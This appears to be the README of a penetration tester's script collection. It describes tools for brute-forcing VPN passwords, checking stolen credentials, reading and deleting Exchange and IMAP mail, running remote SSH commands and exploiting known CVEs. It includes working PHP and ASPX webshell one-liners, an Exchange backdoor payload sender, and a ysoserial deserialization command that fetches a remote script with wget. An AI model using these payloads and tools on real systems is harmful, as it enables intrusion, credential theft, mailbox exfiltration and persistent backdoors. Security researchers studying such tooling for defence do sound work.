Python codes of my blog.
Use Brute-force attack to get the password of PPTP VPN.
It'll read the passwords in file(named wordlist) and then use pptpsetup to connect to the server.
The time interval is 10 seconds.
Use to scan port.
The timeout is 3 seconds.
c++ version:
https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp
Use to get ip from url.
I can use the result of Sublist3r directly.
Use to remove duplicate ip from the result of Sublist3r.
I can use the result of urltoip.py directly.
The IP can be sorted by using Sublime(F9).
Use to remove duplicate items from file.
Reference:
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
Used to call fofa's api and print the IP from the results.
You can get 100 results.
Used to call fofa's api and print the IP from the results.
If you're VIP,you'll get 10000 results.
Reference:
https://seclists.org/fulldisclosure/2019/Sep/31
Eg.
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php
Reference:
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w
Eg.
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');
Use to export the password of the Firefox
Use to get the version of Exchange.
First get the BuildNumber through the souce code of the URL and then get the version.
Reference:
Use to scan the SMBv3 RCE vulnerability.
The timeout is 3 seconds.
Reference:
https://github.com/imjdl/CVE-2020-8515-PoC
CVE-2020-8515
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI..
Affected Products:
- Vigor300B <v1.5.1
- Vigor2960 <v1.5.1
- Vigor3900 <v1.5.1
Use Zimbra SOAP API to connect the Zimbra mail server.
Usage:
Zimbra_SOAP_API.py <url> <username> <password> <mode>
mode:
- low auth for low token
- admin auth for admin token
- ssrf Use CVE-2019-9621 to get the admin token
Eg:
Zimbra_SOAP_API.py https://192.168.1.1 user1@mail.zimbra password low
Use to check the valid account of Exchange Web Service(Support plaintext and ntlmhash)
Reference:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
Usage:
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash
Eg.
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1
Use to access Autodiscover.xml and get the user's configuration(Support plaintext and ntlmhash)
Usage:
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx
Eg.
checkAutodiscover.py 192.168.1.1 443 plaintext user1@test.com password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash user1@test.com c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting
Extra mode of checkAutodiscover.py
Add a parameter
Use to access Exchange Web Service(Support plaintext and ntlmhash)
Usage:
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname
Eg.
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox
Use to check the valid credential of SSH(Support password and privatekeyfile)
Usage:
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile
Eg.
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa
Remote command execution via SSH(Support password and privatekeyfile)
Usage:
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell
Eg.
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps
Use to check the valid credential of eas(Exchange Server ActiveSync)
Usage:
easCheck.py <host> <user> <password>
Eg.
easCheck.py 192.168.1.1 user1 password1
Use to check the valid account of Exchange by connecting to OWA.
Usage:
checkOWA.py <url> <user> <password>
Use to read mails by connecting to OWA.
Usage:
owaManage.py <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment
Use IMAP to connect to the mail server.
Usage:
imapManage.py <IMAP server> <username> <password> <command>
<command>:
CheckConfig get the folder name
SaveAttachOfInbox save the attachments of Inbox
SaveAttachOfSent save the attachments of Sent
DownloadAllMailOfInbox download all the mails of Inbox
DownloadAllMailOfSent download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig
Use to implement NTLM authentication and communicate with execCmd.aspx
Communication data is encoded with Base64
Usage:
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami
C sharp Version: SharpExchangeBackdoor.cs
Use to send payload to the Exchange webshell backdoor.
Support:
- assemblyLoad
- webshellWrite
Usage:
<url> <user> <password> <mode> <path>
mode:
assemblyLoad
webshellWrite
eg.
SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx
assemblyLoad.aspx:
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>
webshellWrite.aspx:
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>
Insecure object deserialization - IMAP
Usage:
<url> <user> <password> <payload path>
Eg.
https://192.168.1.1 user1@test.com password1 payload.obj
Note:
You can generate payload.obj like this:
java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj
Use to test the deserializing code execution of Exchange.
From read and write permissions of Exchange files to deserializing code execution.
You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution.
<path>
:owa or ecp
Usage:
<url> <key> <path>
eg.
192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp
Use to parse Exchange SOAP XML message.
Use to access Exchange admin center
Usage:
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox
- GetCertificate
- ExportCertificate
Use vSphere Automation API(v7.0U1+) to manage the VM
Support Windows and Linux VM
Use vSphere Web Services API to manage the VM
Reference: https://github.com/vmware/pyvmomi/
Install: pip install --upgrade pyvmomi
Use to manage the LDAP database on vCenter.
Use to manage the SolarWinds Orion platform
Use SolarWinds Orion API to manage the Orion platform
Use to manage the MailEnable mail server
It supports receiving results through HTTP or FTP protocol.
Use to access Exchange Web Service(Support plaintext and ntlmhash)
Use to access Exchange Web Service(Support plaintext and ntlmhash)
Use requests_ntlm2 to access Exchange Web Service(Support plaintext and ntlmhash)
Use requests_ntlm2 to access Exchange Web Service(Support plaintext and ntlmhash)
Use session to reduce communication data
Modified from https://github.com/horizon3ai/vcenter_saml_login
Modified from https://github.com/horizon3ai/vcenter_saml_login
Use to get the version of Exchange and match the existing vulnerabilities
Use to get the version of Exchange and parse the version from https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019
You should save https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 as exchange.data
Use to get the version of Exchange and parse the version from https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019
Use to get the internal IP of Exchange
Based on msf auxiliary/scanner/http/owa_iis_internal_ip, but support more Exchange Servers.
Use to get the version of vRealize Operations Manager
Use bash to run command
Use to decrypt the .plx file of Sophos UTM
Reference:
https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
https://github.com/the6p4c/bfs_extract
Use to parse the config of Sophos UTM